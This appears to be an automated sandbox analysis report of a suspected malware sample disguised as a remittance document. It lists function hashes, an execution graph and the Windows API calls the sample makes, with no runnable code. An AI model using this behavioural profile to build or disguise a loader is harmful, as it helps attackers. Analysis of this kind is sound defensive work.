                                            • Instruction ID: 1f9d2a93fc5453cd30c6a397193e8856fe828519e595a47eb85ae7a2f2c776c2
                                            • Opcode Fuzzy Hash: eda97168ed518e4b8aa0a4aa583de33bbcc7fbf52a622cca8563ffb56a85a7b6
                                            • Instruction Fuzzy Hash: 43A16C32E00205CFCF09DFA5D94899EBBB2FF85305B1555BAE805BB262DB71E915CB80
                                            Function 06BE2518 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c2746f69b259937c8209c7b4bd35682b94814e803b944965c03d42e69eb14e8b
                                            • Instruction ID: 745fd1ec7137971789dde5ef7fb88a369901d775f818f53856d6d611ae2c7a2e
                                            • Opcode Fuzzy Hash: c2746f69b259937c8209c7b4bd35682b94814e803b944965c03d42e69eb14e8b
                                            • Instruction Fuzzy Hash: 0E511FB4D006198FCB14DFA9C5405AEFBF6FF89305F1481A9D418A7356D7319A41CFA1
                                            Function 06BE49A7 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60f755453015215399606c85b802279d0bda06910f13a4f484dcbc92889091e9
                                            • Instruction ID: a2f1277a60267f37e0ab3cb5f99410461c8921e493612d7e1d64641f91f428cf
                                            • Opcode Fuzzy Hash: 60f755453015215399606c85b802279d0bda06910f13a4f484dcbc92889091e9
                                            • Instruction Fuzzy Hash: 8451F8B4E002198FDB14DFA9C9805AEFBF2FF89305F2481A9D418A7356D7319942CFA1
                                            Function 052B33F8 Relevance: 15.4, Strings: 12, Instructions: 427COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1756099846
                                            • Opcode ID: da4145e2ebf4cd0a81c4180ba3575e90cced7260bec53b984d43f5de6f2bdd97
                                            • Instruction ID: e90dbe412fb05b206ebb14e84523517c4adaf7d6962218140eb4f69414955cfc
                                            • Opcode Fuzzy Hash: da4145e2ebf4cd0a81c4180ba3575e90cced7260bec53b984d43f5de6f2bdd97
                                            • Instruction Fuzzy Hash: 1BF1A174B60208DFEB18DF68D959BBD7AE2BF98740F104829E4069B3D4DEB48C41CB95
                                            Function 052B3320 Relevance: 8.0, Strings: 6, Instructions: 464COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3261640282
                                            • Opcode ID: 414fa7d828becf3236941c4b40553c68a2bf8156fb9b086effe36de646688840
                                            • Instruction ID: a682c1d0eaa1cd6f323f0707fbf9913bf29926874ded699da15801811b176a37
                                            • Opcode Fuzzy Hash: 414fa7d828becf3236941c4b40553c68a2bf8156fb9b086effe36de646688840
                                            • Instruction Fuzzy Hash: A1F10F34B242549FEB05CB68D868BED7FA2BF89740F144866E442DB3D2CAB48C45CB95
                                            Function 052B33E8 Relevance: 7.9, Strings: 6, Instructions: 390COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3261640282
                                            • Opcode ID: e09eca0f66c7c565430d57533d852211e93ceca5a5ff5a150fc4781b4d6cf321
                                            • Instruction ID: 862b4280330c3f73906000ddefde804d02b8d39fb1af212ea16371f1c92532c5
                                            • Opcode Fuzzy Hash: e09eca0f66c7c565430d57533d852211e93ceca5a5ff5a150fc4781b4d6cf321
                                            • Instruction Fuzzy Hash: C2E1A074B20214DFEB14DF68D959BAD7AE2BF98740F104829E406AB3D5DFB48C41CB91
                                            Function 052B986A Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8aq$8aq$$]q$$]q
                                            • API String ID: 0-2167536008
                                            • Opcode ID: eb2260fa09fc9bf3b268c7d9456ea68ff03fe5330321a1673a799ff88fd9f16e
                                            • Instruction ID: 4d803bb0cf25b307058bfc1309efe2f6f4162d5f456c62a717cbe0451150230b
                                            • Opcode Fuzzy Hash: eb2260fa09fc9bf3b268c7d9456ea68ff03fe5330321a1673a799ff88fd9f16e
                                            • Instruction Fuzzy Hash: 40413971A28A518FE7508B7D88807FABBF1FF46361F048567E6A6C7286C2B4C5C5CB11

                                            Execution Graph

                                            Execution Coverage:1.2%
                                            Dynamic/Decrypted Code Coverage:5.3%
                                            Signature Coverage:8.4%
                                            Total number of Nodes:131
                                            Total number of Limit Nodes:6
                                            execution_graph 94791 42e063 94792 42e073 94791->94792 94793 42e079 94791->94793 94796 42d063 94793->94796 94795 42e09f 94799 42b3b3 94796->94799 94798 42d07e 94798->94795 94800 42b3cd 94799->94800 94801 42b3de RtlAllocateHeap 94800->94801 94801->94798 94802 424223 94807 424232 94802->94807 94803 4242bc 94804 424279 94810 42cf83 94804->94810 94807->94803 94807->94804 94808 4242b7 94807->94808 94809 42cf83 RtlFreeHeap 94808->94809 94809->94803 94813 42b403 94810->94813 94812 424289 94814 42b41d 94813->94814 94815 42b42e RtlFreeHeap 94814->94815 94815->94812 94816 42a6e3 94817 42a6fd 94816->94817 94820 17d2df0 LdrInitializeThunk 94817->94820 94818 42a725 94820->94818 94850 423e93 94851 423eaf 94850->94851 94852 423ed7 94851->94852 94853 423eeb 94851->94853 94854 42b0a3 NtClose 94852->94854 94855 42b0a3 NtClose 94853->94855 94856 423ee0 94854->94856 94857 423ef4 94855->94857 94860 42d0a3 RtlAllocateHeap 94857->94860 94859 423eff 94860->94859 94821 41dc43 94822 41dc69 94821->94822 94826 41dd57 94822->94826 94827 42e193 94822->94827 94824 41dcfb 94824->94826 94833 42a733 94824->94833 94828 42e103 94827->94828 94829 42e160 94828->94829 94830 42d063 RtlAllocateHeap 94828->94830 94829->94824 94831 42e13d 94830->94831 94832 42cf83 RtlFreeHeap 94831->94832 94832->94829 94834 42a74d 94833->94834 94837 17d2c0a 94834->94837 94835 42a779 94835->94826 94838 17d2c1f LdrInitializeThunk 94837->94838 94839 17d2c11 94837->94839 94838->94835 94839->94835 94840 41ab23 94841 41ab67 94840->94841 94842 41ab88 94841->94842 94844 42b0a3 94841->94844 94845 42b0bd 94844->94845 94846 42b0ce NtClose 94845->94846 94846->94842 94861 413b13 94862 413b2c 94861->94862 94867 4174c3 94862->94867 94864 413b4a 94865 413b83 PostThreadMessageW 94864->94865 94866 413b96 94864->94866 94865->94866 94868 4174e7 94867->94868 94869 417523 LdrLoadDll 94868->94869 94870 4174ee 94868->94870 94869->94870 94870->94864 94847 4186c8 94848 42b0a3 NtClose 94847->94848 94849 4186d2 94848->94849 94871 40197a 94872 40198c 94871->94872 94875 42e523 94872->94875 94878 42cb73 94875->94878 94879 42cb99 94878->94879 94890 406ff3 94879->94890 94881 42cbaf 94889 401a87 94881->94889 94893 41a933 94881->94893 94883 42cbce 94884 42cbe3 94883->94884 94908 42b453 94883->94908 94904 427163 94884->94904 94887 42cbf2 94888 42b453 ExitProcess 94887->94888 94888->94889 94911 4161f3 94890->94911 94892 407000 94892->94881 94894 41a95f 94893->94894 94922 41a823 94894->94922 94897 41a9a4 94900 41a9c0 94897->94900 94902 42b0a3 NtClose 94897->94902 94898 41a98c 94899 41a997 94898->94899 94901 42b0a3 NtClose 94898->94901 94899->94883 94900->94883 94901->94899 94903 41a9b6 94902->94903 94903->94883 94905 4271bd 94904->94905 94907 4271ca 94905->94907 94933 418013 94905->94933 94907->94887 94909 42b46d 94908->94909 94910 42b47b ExitProcess 94909->94910 94910->94884 94912 41620a 94911->94912 94914 416223 94912->94914 94915 42baf3 94912->94915 94914->94892 94917 42bb0b 94915->94917 94916 42bb2f 94916->94914 94917->94916 94918 42a733 LdrInitializeThunk 94917->94918 94919 42bb84 94918->94919 94920 42cf83 RtlFreeHeap 94919->94920 94921 42bb9d 94920->94921 94921->94914 94923 41a83d 94922->94923 94927 41a919 94922->94927 94928 42a7d3 94923->94928 94926 42b0a3 NtClose 94926->94927 94927->94897 94927->94898 94929 42a7f0 94928->94929 94932 17d35c0 LdrInitializeThunk 94929->94932 94930 41a90d 94930->94926 94932->94930 94935 41803d 94933->94935 94934 4184ab 94934->94907 94935->94934 94941 413c43 94935->94941 94937 41814a 94937->94934 94938 42cf83 RtlFreeHeap 94937->94938 94939 418162 94938->94939 94939->94934 94940 42b453 ExitProcess 94939->94940 94940->94934 94943 413c62 94941->94943 94942 413d80 94942->94937 94943->94942 94945 413693 94943->94945 94946 4136b5 94945->94946 94948 42b323 94945->94948 94946->94942 94949 42b340 94948->94949 94952 17d2c70 LdrInitializeThunk 94949->94952 94950 42b368 94950->94946 94952->94950 94953 17d2b60 LdrInitializeThunk

                                            Executed Functions

                                            Function 004174C3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 50 4174c3-4174ec call 42dc83 53 4174f2-417500 call 42e1a3 50->53 54 4174ee-4174f1 50->54 57 417510-417521 call 42c643 53->57 58 417502-41750d call 42e443 53->58 63 417523-417537 LdrLoadDll 57->63 64 41753a-41753d 57->64 58->57 63->64
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417535
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                                            • Instruction ID: a00ac800c7afa3b22899d69d7b8551f56e0e2af9d1528a2434e061210ffc3812
                                            • Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                                            • Instruction Fuzzy Hash: 4F011EB5E0020DBBDB10DBA5EC42FEEB7789B54308F4441AAE90897240F675EB548B95
                                            Function 0042B0A3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 70 42b0a3-42b0dc call 404493 call 42c153 NtClose
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 039764a3c07c1c092ebdb1a119b5f68ea8d1673a7b69f32db0182162072c0f4f
                                            • Instruction ID: 71f88b7205fc17ace251b0f12029de2f72aea4145354bcf659e23292c2420cce
                                            • Opcode Fuzzy Hash: 039764a3c07c1c092ebdb1a119b5f68ea8d1673a7b69f32db0182162072c0f4f
                                            • Instruction Fuzzy Hash: 29E086322002147BC610EA5AEC81FDBB75CDFC9754F40805AFA0CA7282C67479118BF4
                                            Function 017D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 84 17d2b60-17d2b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                            • Instruction ID: cfb84d624313eadea449f7af612ad7d1e430112c05f136dccf16f7d06bc42ec3
                                            • Opcode Fuzzy Hash: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                            • Instruction Fuzzy Hash: 1990026120640003420571584418616808A97E4201B55C031E10145A0DC5258A916226
                                            Function 017D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 86 17d2df0-17d2dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                            • Instruction ID: 73c6f7c825fda3dcc9f0a932bc53ca62dd8125dc3e94d0048e0ae64d0ee70065
                                            • Opcode Fuzzy Hash: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                            • Instruction Fuzzy Hash: FC90023120540413D21171584508707408997D4241F95C422A0424568DD6568B52A222
                                            Function 017D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 85 17d2c70-17d2c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                            • Instruction ID: 85804f4409594ef709451d78ba5fdb81f9cc398358337d6c7682427610d4a138
                                            • Opcode Fuzzy Hash: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                            • Instruction Fuzzy Hash: 0D90023120548802D2107158840874A408597D4301F59C421A4424668DC6958A917222
                                            Function 017D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 87 17d35c0-17d35cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                            • Instruction ID: f3bf2810e9835c5e9833fea3ed9fbbc400c90e70eb677d4a5a61e155de262d52
                                            • Opcode Fuzzy Hash: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                            • Instruction Fuzzy Hash: 9890023160950402D20071584518706508597D4201F65C421A0424578DC7958B5166A3
                                            Function 00413B13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(Y656-D6L1,00000111,00000000,00000000), ref: 00413B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: Y656-D6L1$Y656-D6L1
                                            • API String ID: 1836367815-3972793824
                                            • Opcode ID: cd3c3e7c46f328d0d3afa6ef64082d43e87236789113ef286146625a5c3f369b
                                            • Instruction ID: 0c7c1f1c8e5ff488f8f3714297a694b4e5b76a2b4034290cca448231b795bf26
                                            • Opcode Fuzzy Hash: cd3c3e7c46f328d0d3afa6ef64082d43e87236789113ef286146625a5c3f369b
                                            • Instruction Fuzzy Hash: 5A01DB71E4521876DB119A91DC02FDF7B7C9F40714F44805AFB087B281E6B8570687E9
                                            Function 00413AF4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 14 413af4-413af8 15 413b77-413b81 14->15 16 413afa-413b0a 14->16 17 413ba3-413ba8 15->17 18 413b83-413b94 PostThreadMessageW 15->18 18->17 19 413b96-413ba0 18->19 19->17
                                            APIs
                                            • PostThreadMessageW.USER32(Y656-D6L1,00000111,00000000,00000000), ref: 00413B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: Y656-D6L1$Y656-D6L1
                                            • API String ID: 1836367815-3972793824
                                            • Opcode ID: 9191c32317b57ae37b94101882ca4bf9b4682e1b2a3e7e65a1d32994e1b84ab0
                                            • Instruction ID: df2ee2655d51392fe0aa0f270fc30ad2ca18fb5ac1e3ec745ac1a8a9409ac90c
                                            • Opcode Fuzzy Hash: 9191c32317b57ae37b94101882ca4bf9b4682e1b2a3e7e65a1d32994e1b84ab0
                                            • Instruction Fuzzy Hash: A2F05C32B492086AD7124924AC02FFFFBE8CB81711F1041D7FE0CD7181E2955A024795
                                            Function 0042B403 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 38 42b403-42b444 call 404493 call 42c153 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B43F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: qbA
                                            • API String ID: 3298025750-4234322774
                                            • Opcode ID: a251148523efd5093aebc7fd19142b55252fa608008157870dc2a91daca99883
                                            • Instruction ID: eb6735b360267086b53fdbb9421452630409173fff5cfe7d1957500b3b3bab39
                                            • Opcode Fuzzy Hash: a251148523efd5093aebc7fd19142b55252fa608008157870dc2a91daca99883
                                            • Instruction Fuzzy Hash: C1E06D712042087BD610EE99EC41FDB33ACDFC9750F004419F91CA7242CAB0B9518AF9
                                            Function 0042B3B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 65 42b3b3-42b3f4 call 404493 call 42c153 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,0041DCFB,?,?,00000000,?,0041DCFB,?,?,?), ref: 0042B3EF
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: cb67261219ac5e045fb792202214f2bda9db791f41361fa612902bbfeab2b2e4
                                            • Instruction ID: a8d9c00fb8f68b8769643bfa40eae00304f31f2ec0b4d1b12c80e56d0691cb77
                                            • Opcode Fuzzy Hash: cb67261219ac5e045fb792202214f2bda9db791f41361fa612902bbfeab2b2e4
                                            • Instruction Fuzzy Hash: 0DE06DB1604208BBD610EE59DC41FEB33ACDFC9750F004019FA1CA7241C674B9118AF8
                                            Function 0042B453 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 75 42b453-42b489 call 404493 call 42c153 ExitProcess
                                            APIs
                                            • ExitProcess.KERNEL32(?,00000000,?,?,5834D729,?,?,5834D729), ref: 0042B484
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 3a8af0d9e370e63fe2307ca24d552a019e1ec59084b1c4d8e4b3a236a4d56720
                                            • Instruction ID: 72e4cfc11fb6f4ee3a986063804a1ecf3dda5380f3f136b3c547f04173adff43
                                            • Opcode Fuzzy Hash: 3a8af0d9e370e63fe2307ca24d552a019e1ec59084b1c4d8e4b3a236a4d56720
                                            • Instruction Fuzzy Hash: E0E086712002147BD610FA5AEC41F9B775CDFC9765F404029FA0C67246C671B91187F4
                                            Function 017D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 80 17d2c0a-17d2c0f 81 17d2c1f-17d2c26 LdrInitializeThunk 80->81 82 17d2c11-17d2c18 80->82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2f6c5b22767bc1e4ea76ef666367e96e45b76eb5b30d8c3feaab3835d59e5659
                                            • Instruction ID: ede3efcb15847821485b96005da32eac148b59a4bc1864e67c9726b6bfeae819
                                            • Opcode Fuzzy Hash: 2f6c5b22767bc1e4ea76ef666367e96e45b76eb5b30d8c3feaab3835d59e5659
                                            • Instruction Fuzzy Hash: 96B09B719055C5C5DB12E764460C717B95077D0701F15C071D2070651F4738C5D1E276

                                            Non-executed Functions

                                            Function 01812349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 139fd6781def6effa5878b9cdf1d57d469c7dd31bbf5c9190f181c589b0d522f
                                            • Instruction ID: e1bacf8b38a67820d74518e9bdd64869a482602da5ce951131a96da8e5f2e9e0
                                            • Opcode Fuzzy Hash: 139fd6781def6effa5878b9cdf1d57d469c7dd31bbf5c9190f181c589b0d522f
                                            • Instruction Fuzzy Hash: C592D072604346AFE721CF28C884F6BB7EABB84714F14482DFA94D7255D770EA44CB92
                                            Function 017C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule
                                            Strings
                                            • double initialized or corrupted critical section, xrefs: 01805508
                                            • Address of the debug info found in the active list., xrefs: 018054AE, 018054FA
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01805543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054E2
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0180540A, 01805496, 01805519
                                            • Thread identifier, xrefs: 0180553A
                                            • Critical section address., xrefs: 01805502
                                            • undeleted critical section in freed memory, xrefs: 0180542B
                                            • Critical section address, xrefs: 01805425, 018054BC, 01805534
                                            • Critical section debug info address, xrefs: 0180541F, 0180552E
                                            • 8, xrefs: 018052E3
                                            • Invalid debug info address of this critical section, xrefs: 018054B6
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054CE
                                            • corrupted critical section, xrefs: 018054C2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: 67f8446bee1063cd66766666686bb34d9f72d4b729d5bd0adf8dfdab28a7766b
                                            • Instruction ID: ef3423f94379bdaf2f1f76e6ee547046fc4633622babf4b217fe43e670514bc0
                                            • Opcode Fuzzy Hash: 67f8446bee1063cd66766666686bb34d9f72d4b729d5bd0adf8dfdab28a7766b
                                            • Instruction Fuzzy Hash: B68169B1A40348EEDB61CF99C859BAEFBB5AB08B14F204119F504F7281D3B5AA41CF61
                                            Function 017C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0180261F
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018024C0
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01802498
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01802409
